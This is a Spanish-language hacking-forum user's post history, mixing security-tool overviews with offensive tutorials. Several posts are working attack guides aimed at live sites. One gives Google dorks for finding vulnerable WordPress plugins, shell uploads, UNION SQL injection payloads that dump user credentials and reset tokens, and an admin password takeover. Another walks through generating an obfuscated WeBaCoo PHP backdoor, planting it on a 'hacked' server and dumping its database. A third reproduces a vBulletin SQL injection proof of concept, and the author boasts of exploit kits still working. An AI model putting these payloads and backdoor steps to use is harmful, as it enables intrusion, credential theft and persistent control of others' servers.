Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - CalebBucker

#41
Dudas y pedidos generales / Re:alguien que me ayude porfavor
Septiembre 18, 2012, 11:12:43 PM
Recuerdo que con Hotmail  hace poco podía entrar fácilmente a cualquier cuenta Hotmail mediante una vulnerabilidad del mismo Windows Live.

Al parecer Hotmail cambio a Outlook para parchear dicha vulnerabilidad, pero no estoy seguro, tendría que realizar el mismo método para comprobar.

Cuando llegue a casa intentare de nuevo, si logra funcionar te avisare.

Saludos.
#42
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
yo que se puede entrar ataravez de :

1. Temas y plugins sin actualizar
2. Datos de acceso débiles
3. Inyecciones en la base de datos

Si vos crees que con los métodos que mencionas, se puede penetrar un sitio basado en WordPress, me pregunto... Has leído alguna documentación sobre esos métodos?

Te recomiendo que primero LEAS sobre esos métodos y vayas haciendo pruebas con diferentes sitios, de ahi aprenderás mucho.

Por ahora no te bases en Tools, ya que para basarse en Tools primero debemos conocer el funcionamiento de cada vulnerabilidad para estar con la certeza de lo que estamos usando nos funcionara perfectamente.

PD: Todo lo que hagas y/o quieras hacer, aprende-lo solo. Es un humilde consejo  ;)
#43

Un investigador de seguridad ha encontrado una nueva Vulnerabilidad 0day que afecta a Internet Explorer, mientras que el análisis de una página de malware que se estaba utilizando para explotar las vulnerabilidades de Java. Según el equipo de Metasploit, el Internet Explorer 7, 8 y 9 en Windows XP, Vista y 7 son vulnerables a este ataque.

Eric Romang ha descubierto una carpeta "/public/help" en uno de los servidores infectados. Él encontró un archivo flash (.Swf), dos paginas html (protect.html, exploit.html) y el archivo exe.


Al abrir la página exploit.html, carga el archivo flash, que a su vez carga la otra página HTML (protect.html). Juntos, ayudan a bajar el archivo ejecutable en la computadora de la víctima.

El equipo de Metasploit inmediatamente ha desarrollado el módulo para este exploit. Según los investigadores de Metasploit, el exploit, que ya había sido utilizado por los atacantes maliciosos en la naturaleza antes de que fuera publicado en Metasploit, afecta a alrededor del 41% de los usuarios de Internet en América del Norte y el 32% a nivel mundial.

Desde que Microsoft no ha lanzado un parche para esta vulnerabilidad, sin embargo, se aconseja a  los usuarios de IE cambiar a otro navegador hasta que una actualización de seguridad disponible.

exploit.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"exploit.html" es el punto de partida del ataque. Este archivo se crea una matriz de "img" y carga  el archivo Flash "Moh2010.swf"



Moh2010.swf
Este archivo es reconocida como una película de Macromedia Flash Player, y por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Se puede observar que el archivo está lleno de DosSWF que se descomprimira en la memoria. Después de la descompresión "Moh2010.swf" el archivo se derrama en el montón y eval un iframe al archivo "Protect.html".


El código ActionScript incrustado en el original lleno de archivos SWF, también es interesante, podrás ver algunos de codificación especial (chino?).

Este archivo, que durante la explotación es también comprobar si el sitio web está en Flash Website Storage Settings pannel para nada más cargar el archivo "Protect.html". Esto significa, que una vez infectado el usuario ya no será explotado a pesar de nuevas visitas a la página web.

Muestra en la primera visita:


Muestra de la explotación exitosa:


Muestra en otras visitas:


Protect.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si usted echa un vistazo al código fuente, se puede ver el código javascript interesante, como es la manipulación de la "img" matriz creada por "exploit.html".


También verá que las pruebas se hacen, con destino a Windows XP 32-bit e Internet Explorer 7 u 8.



111.exe
Este archivo se reconoce como un archivo de imagen Autodesk FLIC, y por 0 anti-virus en VirusTotal
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El archivo se ha enviado a Malware Tracker (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), este archivo se ve sospechoso y requiere mas investigaciones.

Si deseamos tener el modulo para explotar esta vulnerabilidad desde el Metasploit, es necesario actualizar la misma desde el siguiente link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La captura de pantalla siguiente se muestra un ataque exitoso contra una máquina de Windows 7 con Internet Explorer 9 instalado:


Está es en contra de Internet Explorer 8 instalado:


He aquí otro ejemplo de la explotación en un Windows XP SP3 box, totalmente parcheado:


El exploit también trabaja en contra de Windows Vista.

Fuentes de Información:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Spanish)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#44
Si lo bajaste desde mi blog, al parecer te olvidaste descargar esto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Son los PDF  :)
#45
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 05:22:35 PM
CitarQuize decir que algunos, recien estan aprendiendo... y a lo mejor esto le sirva de mucho o tal vez no, pero siempre y cuando sea para aprender no esta de mas...

Si de hecho, mi respuesta en este tema fue con la intención de mostrar otro "método" para obtener el mismo resultado de una forma avanzada. Por lo tanto no fue con la intención de desprestigiar el post.

#46
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 04:46:32 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.

Realmente este post es para principiantes.

No todos nacen sabiendo.

Ya es tiempo de actualizarse.
#47
Bugs y Exploits / Re:Como hacer una BackConect By Okol
Septiembre 10, 2012, 04:33:13 PM
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.

Realmente este post es para principiantes.

#48


DESCRIPCIÓN:

Dmitry (Deepmagic Information Gathering Tool) es una herramienta para UNIX/GNU exclusivamente programada en C la cual tiene la capacidad de reunir mucha informacion acerca de un Host.

Dmitry tiene una funcionalidad con la posibilidad de añadir nuevas funciones. La funcionalidad básica de Dmitry permite que la información sea recopilada sobre un host desde una simple búsqueda whois y escaneos de puertos TCP.

La aplicación se considera una herramienta para ayudar en la recopilación de información cuando la información es requerida rápidamente mediante la eliminación de la necesidad de introducir múltiples comandos.

UBICACIÓN:

Aplicaciones - BackTrack - Information Gathering - Network Analysis - Route Analysis - dmitry


OPCIONES:

-i Realiza una búsqueda whois sobre el objetivo. Por ejemplo: ./dmitry -i 255.255.255.255


-w Realiza una búsqueda whois en el 'host'. Esto requiere que el objetivo sea en un formato de carácter nombrado. Por ejemplo: ./dmitry -w No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-n Recupera datos desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sobre el host, lo que incluye el sistema operativo, versión del servidor Web y la información UpTime cuando estén disponibles. Por ejemplo: ./dmitry -n No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-s Realiza una búsqueda de un subdominio en el destino especificado. Esto utiliza los motores de búsqueda para intentar localizar a los sub-dominios en forma de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Por ejemplo: ./dmitry -s No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-e Realize una búsqueda de Email en el destino especificado. Este módulo funciona con el mismo concepto que la búsqueda SubDomain tratando de localizar posibles direcciones de correo electrónico de un servidor. Por ejemplo: ./dmitry -e No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-p Realiza un escaneo de puertos TCP en el host. Este módulo mostrará una lista de los puertos abiertos, cerrados y se filtra dentro de un rango específico. Por ejemplo: ./dmitry -p No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-f  Esta opción hará que el módulo TCP PortScan comunicar/mostrar la salida de los puertos filtrados. Estos son por lo general los puertos que se han filtrado y/o cerrado por un servidor de seguridad. Esta opcion requiere la opcion -p. Por ejemplo: ./dmitry -pf No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


-b Esta opción hará que el módulo TCP PortScan muestre el nombre del servicio que esta corriendo al escanear puertos TCP. Esta opción requiere la opción -p Por ejemplo: ./dmitry -pb 174.120.240.9


-t Esto establece el tiempo de vida (TTL) del módulo de escaneo de puertos para escanear puertos individuales. Esto se ajusta a 2 segundos de forma predeterminada. Esto suele ser necesario cuando se escanea un host que tiene un firewall y/o se ha filtrado los puertos.


El código fuente se incluye con este software para que los usuarios y desarrolladores puedan entender el software para fines de auditoría de seguridad.

Saludos.
#49

Algunos atacantes pueden determinar que un sitio web se ejecuta en Joomla! con tan solo escribir No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero en algunos casos, cuando tecleamos /administrator/ automaticamente nos redirecciona al index.php, entonces practicamente el atacante se da por vencido, ya que piensa que el sitio web es Joomla pero el panel admin tiene otro nombre o otra direccion.

Eso sucede por la configuracion que el administrador ha realizado a su sitio Joomla, instalado el Plugin AdminExile que permite a los administradores añadir una clave de acceso al final de la URL que redirige las entradas erróneas a la página de inicio, página 404, o en cualquier otro lugar sin ver el panel de inicio de sesión de administrador.

Ejemplo:

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta           <----- Redirecciona al index.php

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    <----- Admin Panel

Una vez que haya hecho clic en el segundo enlace, su clave AdminExile estará activo hasta que caduque la sesión (o hasta que se cierra el navegador).


Para este caso, he realizado un video demostrativo, donde facilmente logro obtener el key (clave) para ingresar al sitio administrativo sin problemas.

Video:
Descripcion: Obteniendo la configuracion de la db (web) mediante Symlink, obteniendo usuario y clave administrativa, "bypass" AdminPanel y colocando el 0day Java7


Plugin AdminExile: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#50
Hacking ShowOff / XSS Found in Google Play
Septiembre 05, 2012, 02:33:44 PM


STATUS: Reported
#51

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#52

Encryption Wizard (Ewizard) es un simple y fuerte encriptador de archivos y carpetas programada en Java que sirve para proteger la información confidencial (FOUO, Privacy Act, CUI, etc.).

Ewizard encripta todos los tipos de archivos sin privilegios de instalación o elevada ya que se puede ejecutar en Windows, Mac, Linux, Solaris y otros equipos que cuenten con Sun Java.

Detrás de su simple drag-n-drop interfaz, Ewizard ofrece 128-bit AES de cifrado, SHA-256 hashing, búsqueda de meta-datos, archivos, comprensión, eliminación segura y soporte PKI/CAC/PIV.

Ewizard fue inventado y es propiedad del Gobierno de los Estados Unidos de Norteamérica.

La versión publica de esta herramienta puede ser usado por cualquier persona, la versión EW-Public esta diseñada para las computadores del Gobierno Federal de EE.UU y la version EW-Govt esta acreditado por el Ejercito y la Fuerza Aerea para NIPRNet y SIPRNet.

Esta herramienta, por supuesto, esta disponible en nuestra distro favorita (BackTrack 5r3)

UBICACIÓN:

Aplicaciones - BackTrack - Miscellaneous - Miscellaneous Client - Ewizard

Si aun no tenes esta herramienta en tu distro o S.O podes descargarla desde el siguiente link:

- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

USO:

- Para cifrar un archivo, debe especificarse una frase de contraseña y el archivo protegido puede accederse sólo por aquellos que conocen la contraseña correcta.

ENCRIPTANDO ARCHIVOS:

- Abirmos la herramienta desde la consola: java -jar EW-Public-3.3.4.jar


- Para poner a prueba esta herramienta, creamos un archivo, en este caso creare un archivo simple en texto con el nombre "test" y la agregamos a la herramienta (File - Add file/directory)


- Cuando el archivo se ha cargado correctamente en Ewizard, el siguiente paso es hacer click en el botón Encrypt.


- PASSPHRASE: En este paso tenemos que introducir la contraseña, escribimos la contraseña y le damos ADD para seguir con el siguiente paso.


- GENERAR PASSPHRASE: Ewizard  también tiene una función para generar una contraseña segura, para utilizar esta funcion hacemos click en Generate Password. Generada la contraseña la copiamos para luego colocarlo en PASSPHRASE, terminado le damos en Next.


- Keep Files: Hacemos click en Keep files para que la herramienta empieze a encriptar el archivo, por lo que obtendremos un encriptado con exito.


- Nuestro archivo se encripto perfectamente, ahora estamos seguro que sera muy dificil que alguien logre desencriptar el archivo en este tipo de formato.


DESENCRIPTANDO ARCHIVOS:

- Decrypt Files: Para descifrar el archivo, tenemos que seleccionar el archivo y hacer click en el botón Decrypt, de igual forma si tenemos un archivo en este formato lo agregamos a la herramienta desde File - Add File/directory


- Passphrase: Introducimos la contraseña, que colocamos cuando encriptamos el archivo.


- Keep File: Seleccionamos Keep file para desencriptar el archivo, en este caso saldra un aviso sobre si deseo reemplazar el archivo desencriptado por el anterior que cree en el primer paso (test)


- Archivo Desencriptado: Este es el archivo desencriptado (test):


Así es como se puede utilizar esta herramienta para encriptar y desencriptar archivos y carpetas en este tipo de formato.

SITIO OFICIAL DEL PROYECTO: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#53

Al igual que muchas otras herramientas, Lynis fue incluido recientemente en el nuevo BackTrack 5 r3 como una herramienta de Auditoria y Seguridad para muchas distribuciones de Linux.

INTRODUCCIÓN:

Lynis es una herramienta de auditoría que analiza y recopila la información de los sistemas basados ​​en Unix. La audiencia de esta herramienta son la seguridad y el sistema de auditores, especialistas en redes y técnicos de mantenimiento del sistema.

Analiza el software del sistema para detectar problemas de seguridad, también buscará información general del sistema, los paquetes instalados y los errores de configuración.

Este programa tiene como objetivo ayudar en la auditoria automatizada, parches de software de gestión de vulnerabilidades y análisis de malware de los sistemas basados ​​en Unix. Se puede ejecutar sin instalación previa.

DIRIGIDO PARA:

- Especialistas en Seguridad.
- Pentesters
- Auditores de Sistema.
- Administradores de Sistema y Redes.

DISTRIBUCIONES ADMITIDAS:

- Debian
- CentOS
- Gentoo
- Fedora Core 4 and higher
- FreeBSD
- Arch Linux
- Knoppix
- OpenSuSE
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- Mac OS X
- PcBSD
- Ubuntu
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10

INSTALACIÓN:

- apt-get install lynis

LYNIS AUDITA LOS SIGUIENTES SERVICIOS:

- System Tools
- Boot and services
- Kernel
- Memory and processes
- Users, Groups and Authentication
- Shells
- File systems
- Storage
- NFS
- Software: name services
- Ports and packages
- Networking
- Printers and Spools
- Software: e-mail and messaging
- Software: firewalls
- Software: webserver
- SSH Support
- SNMP Support
- Databases
- LDAP Services
- Software: PHP
- Squid Support
- Logging and files
- Insecure services
- Banners and identification
- Scheduled tasks
- Accounting
- Time and Synchronization
- Cryptography
- Virtualization
- Security frameworks
- Software: file integrity
- Software: Malware scanners
- System Tools
- Home directories
- Kernel Hardening
- Hardening

ABRIENDO LA HERRAMIENTA:

- Aplicaciones - BackTrack - Vulnerability Assessment - Vulnerability Scanners - Lynis


EJEMPLOS REALES:

Para auditar nuestro sistema, simplemente colocamos el comando ./lynis --auditor "tunombre" y presionamos ENTER por lo que la herramienta empezara a trabajar.

- Lynis: OS Detection:


- System Tools y Boot and Services:


- Kernel y Memory and processes:


- Networking y Printers and Spools:


- Software: webserver:


LYNIS REPORT:

- cd /var/log/
- cat lynis-report.dat


- vim lynis-report.dat


Este es el mejor Programa de Auditoría Linux.

Lynis da una cantidad y profundidad de la información acerca de su sugerencia de Linux, lo que ayudará a mejorar la seguridad de nuestro Linux.

SITIO OFICIAL DEL PROYECTO: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#54
WhatWeb es muy buena tool para obtener todos los datos del servidor web.

Saludos.
#55

WordPress  ¿Qué es?

WordPress es un sistema de gestión de contenido (en inglés Content Management System, o CMS) enfocado a la creación de blogs (sitios web periódicamente actualizados). Desarrollado en PHP y MySQL, bajo licencia GPL y código modificable. WordPress se ha convertido junto a Movable Type en el CMS más popular de la blogosfera y en el más popular con respecto a cualquier otro CMS de aplicación general. Las causas de su enorme crecimiento son, entre otras, su licencia, su facilidad de uso y sus características como gestor de contenidos.

WordPress ¿Objetivo de Hackers?

Según Wikipedia: WordPress es usado por más del 16,7% en el rank Alexa Internet "top 1 million" de sitios web y en agosto de 2011 gestiona el 22% de todos los nuevos sitios web.

Esto y debido a los miles de plugins y temas disponibles para WordPress, no hace falta decir que los programadores han codificado descuidadamente una parte equitativa de estos y que las posibilidades de una mayor escalada de privilegio para el hacker si encuentra un sitio web utilizando un plugin explotable o no actualizados . Estos pueden ir desde las vulnerabilidades de tipo SQLi a LFI de la que voy a explicar más abajo. Pero en términos más simples un plugin web explotable eventualmente puede conducir a la administración y el acceso total al servidor.

¿Cómo encontramos sitios web que utilicen WordPress?

Usando dorks simples que pueden ser eficaces, por ejemplo:
Código: txt
intext:"Proudly powered by WordPress. "
intext:"Powered by WordPress. "


Además, podemos utilizar la ruta de configuración estándar de WordPress, utilizando la siguiente dork:
Código: txt
inurl: /wordpress/wp-content/plugins/


Esto encuentra un montón de sitios web de WordPress con los listados de directorios habilitados. Podemos navegar por el directorio y tomar nota de los plugins que utiliza el servidor. Esto es parte del proceso de enumeración, una vez que hemos tomado nota de lo plugins nos dirigimos a exploit-db en busca de exploits para dichos plugins.

Código: txt
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_port=&filter_osvdb=&filter_cve=


¿Cómo explotamos sitios WordPress? Ejemplos reales:

1) Arbitrary File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php


Apreciaremos el sitio web de la siguiente forma:


Después de eso, es muy sencillo subir y localizar nuestra shell, solo queda disfrutar de ella.


2) Stored XSS: Version 3.2.3, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/count-per-day/notes.php


Apreciaremos el sitio web de la siguiente forma:


Podemos inyectar cualquier codigo javascript (XSS) la cual automaticamente se almacenara en el stored. El archivo "notes.php" no se limita solo a los administradores, por lo tanto cualquier persona puede acceder al archivo.


3) Arbitrary File Upload: Custom Content Type Manager, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php


Apreciaremos el sitio web de la siguiente forma:


Desde ahí se puede subir una shell, pero tenemos que cargarlo como una extensión de imagen (JPG/PNG/GIF). Para acceder a la shell, la encontraremos la siguiente manera:

Código: txt
http://www.sitio-web.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg



4) SQL Injection: Wordpress HD Webplayer - Version 1.1, usamos la siguiente dork:

Código: txt
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=


Apreciaremos el sitio web de la siguiente forma:


Desde ahí se puede hacer una inyección básica, en primer lugar nos encontramos con las columnas, digamos que tiene 11, entonces inyectamos de la siguiente manera:

Código: txt
videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7,8,9,10,11+from​​+wp_users


Luego, por supuesto, una vez que se ha inyectado vamos a obtener los datos del administrador:


5) [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

Esta vulnerabilidad se puede utilizar cuando tenemos un sitio web WordPress vulnerable a SQL Injection, la cual podemos obtener los datos administrativos como son el USUARIO, E-MAIL y PASSWORD, pero como ya sabemos y apreciamos en la imagen anterior, todo PASSWORD de WordPress estan encryptadas de una manera que es muy dificil de desencryptar, para ello usaremos esto metodo que consiste en Resetear el Password con el usuario o e-mail administrativo, la cual obtendremos un Token con lo que facilmente podemos cambiar la contraseña administrativa.

Obtendremos el user_login y user_email de la siguiente manera:
Código: txt
/*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

Obtenido el usuario o e-mail nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y seleccionamos en ¿Olvidó su contraseña? introducimos el usuario o e-mail


Presionaremos en "Get New Password" la cual el sitio web enviara una codigo de activacion (Token)   entonces como es logico, dicho Token se almacena en la DB, por lo tanto obtendremos dicho codigo de la siguiente manera:
Código: txt
/*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,1​0,11 from wp_users


Obtenido dicho Token, solo nos faltaria restablecer la contraseña, para ello nos dirigimos al siguiente link:
Código: txt
http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario


Remplazamos "Token" y "Usuario" por lo datos que nos arroja la DB, por ejemplo:
Código: txt
http://www.sitio-web.com/wp-login.php?action=rp&key=RXr7T7lplszV&login=admin


Por lo que obtendremos la opcion de restablecer la contraseña facilmente, como vemos en la siguiente imagen:


6) Full Path Disclosure (FPD), usaremos la siguiente dork:
Código: txt
inurl:"/wp-includes/

Apreciaremos el sitio web de la siguiente forma:


Dando click en cualquiera de los archivos, facilmente el sitio web nos mostrara el Path (ubicacion) de sus archivos.

Ejemplo:
Código: txt
http://www.vulnerability-lab.com/dev/wp-includes/admin-bar.php


Mayormente esta Vulnerabilidad lo tienen el 80% de todos los sitios WordPress, pues facilmente podemos ir a cualquier sitio (WordPress) y diriginos a /wp-includes/ para apreciar dicha vulnerabilidad.

7) Fingerprinting WordPress version:

Este metodo sirve para obtener las versiones correcta de un sitio WordPress, para ello existen muchas herramientas como son:

Esas herramientas aparte de obtener la versión de WordPress de la página web, tambien puede  obtener información sobre las versiones de los plugins instalados y compara su versión a la última y más a la versión de los datos disponibles en la actualidad que indica si puede ser vulnerable o no.

Es todo por ahora.

Saludos.
#56
Código: txt
Finalmente Oracle publicó ayer un parche que soluciona esta vulnerabilidad y otras tres más. Se ha conocido también que la vulnerabilidad CVE-2012-4681 fue reportada por Security Explorations hace cuatro meses. Esta misma empresa ha asegurado que la actualización de Oracle publicada ayer no cubre otras vulnerabilidades que reportaron en abril de este año.


Eso lo que dicen es cierto, porque desde hace ya un tiempo hasta ahora mis Exploit's Kit's siguen funcionando de maravillas, entonces eso quiere decir que Java NO tiene "parcheada" todas sus vulnerabilidades.

Cabe resaltar que la Vulnerabilidad 0day en Java7, aun sigue funcionando y funcionara siempre y cuando el usuario no actualize su Java.

Saludos.
#57

WeBaCoo (Web Backdoor Cookie)  es un backdoor web script-kit que proporciona una terminal de  conexión a través de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).

WeBaCoo fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.

WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos. También ofrece la "terminal" el modo en que el usuario puede establecer una remota  conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.

En muchos casos, esta herramienta es muy usada cuando un servidor no tiene instalado el Netcat.

INSTALACIÓN:

COMANDOS:

1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
Código: txt
./webacoo.pl -g -o backdoor.php

2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
Código: txt
./webacoo.pl -g -o raw-backdoor.php -f 4 -r

3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
Código: txt
./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
Código: txt
./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
Código: txt
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
Código: txt
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
Código: txt
./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt


Ahora bien, teniendo la herramienta instalada y conociendo los comandos, procederemos a crear el backdoor para obtener conexión con el servidor web desde la consola.

Para este caso he obtenido un servidor cualquiera (hacked) donde subiré el backdoor que creare con el siguiente comando:
Código: txt
./webacoo.pl -g -o backdoor.php


El backdoor.php se crea y ubica en la carpeta de los archivos (WeBaCoo), entonces subiremos dicho archivo al servidor (hacked) y procederemos a conectarnos al servidor con el siguiente comando:
Código: txt
./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php


La conexión hacia el servidor es perfecta, por lo que obtendremos la conexión muy rapida.

Comandos Simples:

En este caso colocaremos "load" para ver los comandos con los que manejaremos todo el servidor, las cuales son los siguientes:

1) MySQL-CLI: MySQL Command Line Module:
Código: txt
mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')

2) PSQL-CLI: Postgres Command Line Module:
Código: txt
psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

3) Upload: File Upload Module:
Código: txt
upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')

4) Download: File Download Module:
Código: txt
download <remote_file>                   (ex. 'download config.php')

5) Stealth: Enhance Stealth Module
Código: txt
stealth <webroot_dir>                 (ex. 'stealth /var/www/html')


Estos comandos son fáciles de usar, haré una breve demostración con el comando MySQL-CLI para obtener y conectarme a la db del servidor.

1) Descargamos el archivo de configuración:
Código: txt
download configuration.php 


2) Abrimos el archivo configuration.php copiar el user y password del MySQL, tecleamos el comando:
Código: txt
mysql-cli 127.0.0.1:3306 db_user db_password



3) La tool conectara al MySQL, solo nos queda teclear show databases; para apreciar toda la DB.


De igual forma utilizaremos los demás comandos para subir un local root exploit o descargar cualquier archivo del servidor.

Ahora con esta herramienta ya no es necesario que un servidor web tenga el Netcat o hacer un BackConnection que muchas veces no funciona, para conectarse a un servidor web.

Espero les sirva.

Saludos.
#58
Nueva vulnerabilidad que afecta los sistemas de Vbulletin en la version 4.0.2.

Recien salida del horno:

Código: txt
# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+



The vulnerability exists within /request_award.php.

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string

($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.


- POC -
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit


Thanks. Have fun.

http://www.bugabuse.net/
#59
El parche se encuentra disponible: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De 10 personas solo 8 actualizaran.
#60
Es parecido a un Exploit Kit.

Debería salirte algo asi: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.